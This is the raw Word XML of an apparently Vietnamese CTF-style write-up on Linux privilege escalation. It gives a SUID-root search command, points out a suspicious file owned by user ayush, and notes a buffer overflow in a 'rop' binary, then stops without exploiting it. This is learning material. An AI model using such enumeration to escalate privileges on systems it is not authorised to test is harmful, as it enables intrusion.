    <w:p w14:paraId="1B45B497" w14:textId="2168C162" w:rsidR="00A21167" w:rsidRDefault="006C067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E59E500" wp14:editId="4BCF0F45">
            <wp:extent cx="5943600" cy="13506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9941" w14:textId="1937257D" w:rsidR="008649B0" w:rsidRDefault="008649B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A5DBD6" w14:textId="191CCF8C" w:rsidR="008649B0" w:rsidRPr="008649B0" w:rsidRDefault="008649B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008649B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEEED5A" w14:textId="6189B058" w:rsidR="00CA2E6F" w:rsidRDefault="00CA2E6F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3EF77B" w14:textId="64387407" w:rsidR="006C0674" w:rsidRDefault="006C067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1B973BE" wp14:editId="1031DEAE">
            <wp:extent cx="4229100" cy="419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20EF" w14:textId="5C353097" w:rsidR="006C0674" w:rsidRDefault="006C0674">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F95E838" w14:textId="0152FC63" w:rsidR="006C0674" w:rsidRDefault="006A4E5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23E77A9" wp14:editId="0BE79EB7">
            <wp:extent cx="4013200" cy="469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F6F2" w14:textId="2167E0B7" w:rsidR="008649B0" w:rsidRDefault="004D12D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Tìm các tệp thực thi có suid là root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292499CF" w14:textId="7C2D5F0E" w:rsidR="004D12D2" w:rsidRDefault="004D12D2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A49983" w14:textId="5273BA80" w:rsidR="004D12D2" w:rsidRPr="004D12D2" w:rsidRDefault="004D12D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D12D2">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find / -type f -perm -04000 -ls 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6AEA5" w14:textId="5B327C36" w:rsidR="004D12D2" w:rsidRDefault="004D12D2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD41702" w14:textId="52CBB615" w:rsidR="004D12D2" w:rsidRDefault="004D12D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Thấy 1 tập tin đáng nghi của người dùng ayush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44290E8D" w14:textId="46CEF457" w:rsidR="004D12D2" w:rsidRDefault="004D12D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C80917D" wp14:editId="3368EC00">
            <wp:extent cx="5943600" cy="3200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5929" w14:textId="30352145" w:rsidR="006A4E5F" w:rsidRDefault="006A4E5F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014A1256" w14:textId="0636C7D4" w:rsidR="00E06374" w:rsidRDefault="00E0637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Nó in đầu vào của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB78232" w14:textId="12BFE4F3" w:rsidR="006A4E5F" w:rsidRDefault="004D12D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7D0B21E" wp14:editId="69FC651C">
            <wp:extent cx="2171700" cy="660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108E" w14:textId="70D8D0D4" w:rsidR="00923C9B" w:rsidRDefault="00923C9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D04C87" w14:textId="6BE31FCC" w:rsidR="00923C9B" w:rsidRDefault="00923C9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Tệp nhị phân rop bị dính lỗ hổng buffer overflow. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0347CAC0" w14:textId="7439E21E" w:rsidR="00D8316D" w:rsidRDefault="00D8316D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA485D8" w14:textId="0D874315" w:rsidR="00D8316D" w:rsidRDefault="00D8316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chưa học lỗ hổng buffer overflow nên sẽ dừng lại ở đây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E290DC" w14:textId="77777777" w:rsidR="006509A9" w:rsidRPr="00051239" w:rsidRDefault="006509A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006509A9" w:rsidRPr="000512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377B48" w14:textId="77777777" w:rsidR="002773EB" w:rsidRDefault="002773EB" w:rsidP="00F203A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5260971C" w14:textId="77777777" w:rsidR="002773EB" w:rsidRDefault="002773EB" w:rsidP="00F20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25EDFE" w14:textId="77777777" w:rsidR="002773EB" w:rsidRDefault="002773EB" w:rsidP="00F203A1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4D7F3C09" w14:textId="77777777" w:rsidR="002773EB" w:rsidRDefault="002773EB" w:rsidP="00F203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83E"/>
    <w:rsid w:val="000234CA"/>
    <w:rsid w:val="00034F32"/>
    <w:rsid w:val="00047DC1"/>
    <w:rsid w:val="00051239"/>
    <w:rsid w:val="000D0A88"/>
    <w:rsid w:val="000F44E1"/>
    <w:rsid w:val="001168D9"/>
    <w:rsid w:val="001B45C8"/>
    <w:rsid w:val="001E77C4"/>
    <w:rsid w:val="002773EB"/>
    <w:rsid w:val="002D6C91"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00323056"/>
    <w:rsid w:val="0034378E"/>
    <w:rsid w:val="003449B0"/>
    <w:rsid w:val="003921F9"/>
    <w:rsid w:val="00411B17"/>
    <w:rsid w:val="004202F7"/>
    <w:rsid w:val="00462168"/>
    <w:rsid w:val="004A436E"/>
    <w:rsid w:val="004D12D2"/>
    <w:rsid w:val="00533637"/>
    <w:rsid w:val="0054312D"/>
    <w:rsid w:val="00561AAC"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006509A9"/>
    <w:rsid w:val="006A4E5F"/>
    <w:rsid w:val="006B5BB4"/>
    <w:rsid w:val="006C0674"/>
    <w:rsid w:val="006D4A87"/>
    <w:rsid w:val="00765DDD"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="008649B0"/>
    <w:rsid w:val="00912D86"/>
    <w:rsid w:val="00923C9B"/>
    <w:rsid w:val="009B559F"/>
    <w:rsid w:val="00A07F43"/>
    <w:rsid w:val="00A16ACE"/>
    <w:rsid w:val="00A20CDB"/>
    <w:rsid w:val="00A21167"/>
    <w:rsid w:val="00A25712"/>
    <w:rsid w:val="00A76EE9"/>
    <w:rsid w:val="00B17831"/>
    <w:rsid w:val="00B44F1D"/>
    <w:rsid w:val="00B551C0"/>
    <w:rsid w:val="00BB7F1F"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BD1303"/>
    <w:rsid w:val="00BE3032"/>
    <w:rsid w:val="00C723B7"/>
    <w:rsid w:val="00CA2E6F"/>
    <w:rsid w:val="00D04462"/>
    <w:rsid w:val="00D135DF"/>
    <w:rsid w:val="00D23289"/>
    <w:rsid w:val="00D8316D"/>
    <w:rsid w:val="00DA4AE1"/>
    <w:rsid w:val="00DB083E"/>
    <w:rsid w:val="00DC0BFD"/>
    <w:rsid w:val="00DC2B31"/>
    <w:rsid w:val="00E06374"/>
    <w:rsid w:val="00E31FBD"/>
    <w:rsid w:val="00E5042E"/>
    <w:rsid w:val="00F203A1"/>
    <w:rsid w:val="00F34B2E"/>
    <w:rsid w:val="00F648F0"/>
    <w:rsid w:val="00FA107E"/>
    <w:rsid w:val="00FC7563"/>
    <w:rsid w:val="00FD2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D4EFCBD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2383A40C-30E9-6748-AA1C-84E330EE4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  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F203A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03A1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F203A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03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10</Pages>
  <Words>290</Words>
  <Characters>1656</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1943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63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-06T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-06T14:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>